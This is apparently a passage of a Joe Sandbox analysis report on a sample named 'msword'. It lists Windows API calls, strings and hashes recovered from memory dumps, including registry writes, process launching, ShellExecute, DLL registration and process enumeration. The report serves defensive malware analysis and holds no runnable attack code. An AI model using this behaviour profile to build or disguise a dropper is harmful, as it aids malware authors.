                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                          • GetSysColor.USER32(?), ref: 004041DB
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                          • SetCursor.USER32(00000000), ref: 004042FE
                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                          • SetCursor.USER32(00000000), ref: 00404322
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: F$N$open
                                          • API String ID: 3928313111-1104729357
                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                          APIs
                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                          • wsprintfA.USER32 ref: 00406B79
                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                          • API String ID: 565278875-3368763019
                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          Strings
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-3206598305
                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • `G, xrefs: 0040246E
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                          • API String ID: 1033533793-4193110038
                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                          • GetSysColor.USER32(?), ref: 00403E57
                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                          • DeleteObject.GDI32(?), ref: 00403E81
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                          APIs
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: success ("%s"), xrefs: 00402263
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: command="%s", xrefs: 00402241
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                          • GetMessagePos.USER32 ref: 0040489D
                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
